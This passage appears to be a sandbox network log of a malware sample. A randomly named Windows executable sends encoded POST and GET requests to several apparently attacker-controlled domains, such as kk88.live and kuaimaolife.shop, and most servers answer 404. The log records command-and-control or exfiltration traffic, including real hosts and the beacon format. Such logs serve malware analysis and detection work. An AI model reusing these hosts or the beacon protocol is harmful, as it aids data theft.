                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              34 | 192.168.2.6 | 50028 | 68.178.233.113 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:35:37.460064888 CEST | 775 | OUT | POST /m1w5/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.kk88.live
                                                                                                                              Origin: http://www.kk88.live
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.kk88.live/m1w5/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=6pkncK1UsB48Mio+Tm6mv9QJQX4ihq4MogIF9xqM/RhQJBIehyxd6+s0luiKiC5DnjDlW04qoLQXSOegTeoPHAdCpfSd1pwyjKy0VaCVejCg8ahZOsxThG2BF16Uv3C/sdpyl+szq7w7riXu3Ng0+27BecRZP/cSGTezHfcY2yqUiDPN5AYG50CqOKFOK0xsuQ7utuCWORynIcrV2gpuC72jGGujK4JBBA==
                                                                                                                              Oct 7, 2024 12:35:38.347407103 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:38 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 315
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              35 | 192.168.2.6 | 50029 | 68.178.233.113 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:35:40.018347979 CEST | 1788 | OUT | POST /m1w5/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.kk88.live
                                                                                                                              Origin: http://www.kk88.live
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.kk88.live/m1w5/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:35:40.914504051 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:40 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 315
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              36 | 192.168.2.6 | 50030 | 68.178.233.113 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:35:42.555382013 CEST | 501 | OUT | GET /m1w5/?ej6Le=3rMHf/BSjWsGYHwCFDyQr7UpHD469M8Ow0JV4TmI6XMWIkQCx3J07rEG1KeFsj1Bt3GmHG0JhP0iSMuoC4YaBVBwifK18YsKoqHqcY+PGErO86AoCrs033ftT3/LwHGHiZtPsOM=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.kk88.live
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:35:43.466133118 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:43 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 315
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              37 | 192.168.2.6 | 50031 | 3.33.130.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:35:48.519418001 CEST | 778 | OUT | POST /g5rn/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.cablecarrental.net
                                                                                                                              Origin: http://www.cablecarrental.net
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.cablecarrental.net/g5rn/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=t5DcalmbYVRT3KsVqZ2twBmaQmPh93vrV1POhyPSkF6XucfcrHzB1cBTx+gmnvEfkfrHruo+tA1/Lugo8i/QVzGO2fe+HPcm2qiSUhWKOWBlgJXqaQOVEGycG3lNKVbGjWMjl9W6IbhRHbuFGxLDEAkTshrkB7fsa+awKfhb8xERRKEBEUBdhUbUkg5MZHFjNg8cNTro4pX8


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              38 | 192.168.2.6 | 50032 | 3.33.130.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:35:51.058733940 CEST | 802 | OUT | POST /g5rn/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.cablecarrental.net
                                                                                                                              Origin: http://www.cablecarrental.net
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.cablecarrental.net/g5rn/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=t5DcalmbYVRTlbcVp6OthxmZVmPh0XuiV1zOhz7Ck2OXu4XcqGzB78BTpugnpPEQkfm6rrI+tAJ/Lrco8RnTXjGb+/e4Yfcm2qiSUhSkOW5ln5nqZ16WHGydPXlNOVaNjWMRl86cIYVRHfqFGgLMTQkVhBqNNeuIXObsFc8+tQgaZcFbYnB+zE7Wkih+ZnFJPgEcfEnP3dyfSU1l2Qg3d6RJ0tksE0fj5g==


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              39 | 192.168.2.6 | 50033 | 3.33.130.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:35:53.605835915 CEST | 1815 | OUT | POST /g5rn/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.cablecarrental.net
                                                                                                                              Origin: http://www.cablecarrental.net
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.cablecarrental.net/g5rn/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              40 | 192.168.2.6 | 50034 | 3.33.130.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:35:56.154337883 CEST | 510 | OUT | GET /g5rn/?ej6Le=g7r8ZVC0cxJrkvwRypX7ol6hCzLGk0q5Jh6A3BrwknfWwIjVhyX9x4N34a97pOgSsNGPocoejkJQBdcVqC7tK2vQwMKTMeAj0+OVYz2VfmsetKnlMlSnUnOZTT0AV1eZjywajZ8=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.cablecarrental.net
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:35:56.622138023 CEST | 413 | IN | HTTP/1.1 200 OK
                                                                                                                              Server: openresty
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:56 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 273
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ej6Le=g7r8ZVC0cxJrkvwRypX7ol6hCzLGk0q5Jh6A3BrwknfWwIjVhyX9x4N34a97pOgSsNGPocoejkJQBdcVqC7tK2vQwMKTMeAj0+OVYz2VfmsetKnlMlSnUnOZTT0AV1eZjywajZ8=&An=mLdxo2Y8RLRh"}</script></head></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              41 | 192.168.2.6 | 50035 | 38.55.251.233 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:36:10.166371107 CEST | 772 | OUT | POST /9wb2/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.kuaimaolife.shop
                                                                                                                              Origin: http://www.kuaimaolife.shop
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.kuaimaolife.shop/9wb2/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=0WNkMAYbSIuVX4oh9jAt6bdEk/Cu9CKlGBgYB+2oJ8pZLkoRFslcfPc35sqCLzGaVc5CBUYFJ0ZwaG6duLO8IoWq9Q3tOYnIrOs4zq0mqoW+CGC23+DMTmHm/MGXXPJucq9D16EyfvrFJFer3oBOVp7Ncx+7U6Aqnz/LyMJuSyTStH6+7VFWFFpx240XVXS4YRW4Q0fCJMkp
                                                                                                                              Oct 7, 2024 12:36:11.020119905 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 07 Oct 2024 10:36:10 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 548
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              42 | 192.168.2.6 | 50036 | 38.55.251.233 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:36:12.705909967 CEST | 796 | OUT | POST /9wb2/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.kuaimaolife.shop
                                                                                                                              Origin: http://www.kuaimaolife.shop
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.kuaimaolife.shop/9wb2/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=0WNkMAYbSIuVXYYhxiAttrdFh/Cu3iLsGBkYB7HtKO9ZLFYREtlcPfc3rMqHPzGRVcE9BVUFJ0NwaGKdt86/O4Woyw3jRonIrOs4zqgMqoe+CzK2xbvDaGH5+MGXTPJqcq8U1/tlftjFJFur38tNGJ7LCB+vf+YjnVjIyv5hSRPHsx7knmF1XVJz26slV3SSaRu4CjTlG4BK8aR4wzhttdmeaPI+KNO/Vw==
                                                                                                                              Oct 7, 2024 12:36:13.566414118 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 07 Oct 2024 10:36:13 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 548
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              43 | 192.168.2.6 | 50037 | 38.55.251.233 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:36:15.245714903 CEST | 1809 | OUT | POST /9wb2/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.kuaimaolife.shop
                                                                                                                              Origin: http://www.kuaimaolife.shop
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.kuaimaolife.shop/9wb2/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le= [TRUNCATED]
                                                                                                                              Oct 7, 2024 12:36:16.072273970 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 07 Oct 2024 10:36:15 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 548
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              44 | 192.168.2.6 | 50038 | 38.55.251.233 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:36:17.787180901 CEST | 508 | OUT | GET /9wb2/?ej6Le=5UlEP0kDVMW/PPEwoDc70sMozoicrCD3NhlqEuGPGOUFJHosOZBhD6Eku4DzDmeGf+gBdkEGC1Jne06x+N2lRr6ZxBLzarbPmMoZ56wq7frcAS7q07bHFFW9m+jVLfRUYpA8+/U=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.kuaimaolife.shop
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:36:18.630810022 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 07 Oct 2024 10:36:18 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 548
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              45 | 192.168.2.6 | 50040 | 162.0.215.33 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:36:23.694304943 CEST | 787 | OUT | POST /rq5n/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.nieuws-july202491.sbs
                                                                                                                              Origin: http://www.nieuws-july202491.sbs
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.nieuws-july202491.sbs/rq5n/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=kk/koLewoJoJ9c7e5Un2veCKGa3B7JrTM3LxjnuBqt+iaXStR/q3eHNOZsDn83XAOIDjQ27O5j5vg+0sLSFInQDukllExvSb7pU/jcQyr3vPt93QDsC1MRRsd3CR620RZAESlk8SVjw8mK8Hq5p3N9kU3AXz8ae4tpVZhudlJ1HnrQqzitGyOyDYN3mapoIMrEZMx0ApbpSC
                                                                                                                              Oct 7, 2024 12:36:24.285926104 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                              content-type: text/html
                                                                                                                              transfer-encoding: chunked
                                                                                                                              content-encoding: gzip
                                                                                                                              vary: Accept-Encoding
                                                                                                                              date: Mon, 07 Oct 2024 10:36:24 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              connection: close
                                                                                                                              Oct 7, 2024 12:36:24.285974979 CEST | 1236 | IN
                                                                                                                              Oct 7, 2024 12:36:24.286021948 CEST | 1236 | IN
                                                                                                                              Oct 7, 2024 12:36:24.286058903 CEST | 1236 | IN
                                                                                                                              Oct 7, 2024 12:36:24.286091089 CEST | 287 | IN


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              46 | 192.168.2.6 | 50041 | 162.0.215.33 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:36:26.234390974 CEST | 811 | OUT | POST /rq5n/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.nieuws-july202491.sbs
                                                                                                                              Origin: http://www.nieuws-july202491.sbs
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.nieuws-july202491.sbs/rq5n/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:36:26.837969065 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                              content-type: text/html
                                                                                                                              transfer-encoding: chunked
                                                                                                                              content-encoding: gzip
                                                                                                                              vary: Accept-Encoding
                                                                                                                              date: Mon, 07 Oct 2024 10:36:26 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              connection: close
                                                                                                                              Oct 7, 2024 12:36:26.838063002 CEST | 1236 | IN
                                                                                                                              Oct 7, 2024 12:36:26.838089943 CEST | 1236 | IN
                                                                                                                              Oct 7, 2024 12:36:26.838109016 CEST | 1236 | IN
                                                                                                                              Oct 7, 2024 12:36:26.838124037 CEST | 288 | IN


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              47 | 192.168.2.6 | 50042 | 162.0.215.33 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:36:28.782408953 CEST | 1824 | OUT | POST /rq5n/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.nieuws-july202491.sbs
                                                                                                                              Origin: http://www.nieuws-july202491.sbs
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.nieuws-july202491.sbs/rq5n/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:36:29.376069069 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                              content-type: text/html
                                                                                                                              transfer-encoding: chunked
                                                                                                                              content-encoding: gzip
                                                                                                                              vary: Accept-Encoding
                                                                                                                              date: Mon, 07 Oct 2024 10:36:29 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              connection: close
                                                                                                                              Oct 7, 2024 12:36:29.376112938 CEST | 224 | IN
                                                                                                                              Oct 7, 2024 12:36:29.376151085 CEST | 1236 | IN
                                                                                                                              Oct 7, 2024 12:36:29.376188993 CEST | 1236 | IN
                                                                                                                              Oct 7, 2024 12:36:29.376224995 CEST | 1236 | IN
                                                                                                                              Oct 7, 2024 12:36:29.376260996 CEST | 64 | IN


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              48 | 192.168.2.6 | 50043 | 162.0.215.33 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:36:31.367244005 CEST | 513 | OUT | GET /rq5n/?ej6Le=pmXEr/OQw9QJm4Xk+l3iuqWeb8HinOXDTGqjp1WLtMjib1CidozVAjoZZY6l6lG8OprBPnix8hR5i/scUhhw8x7Qq3ZF1dacyLUi3r4qrR6Xp8uTLrynRTshDzTWpn0bQ1psq0A=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.nieuws-july202491.sbs
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
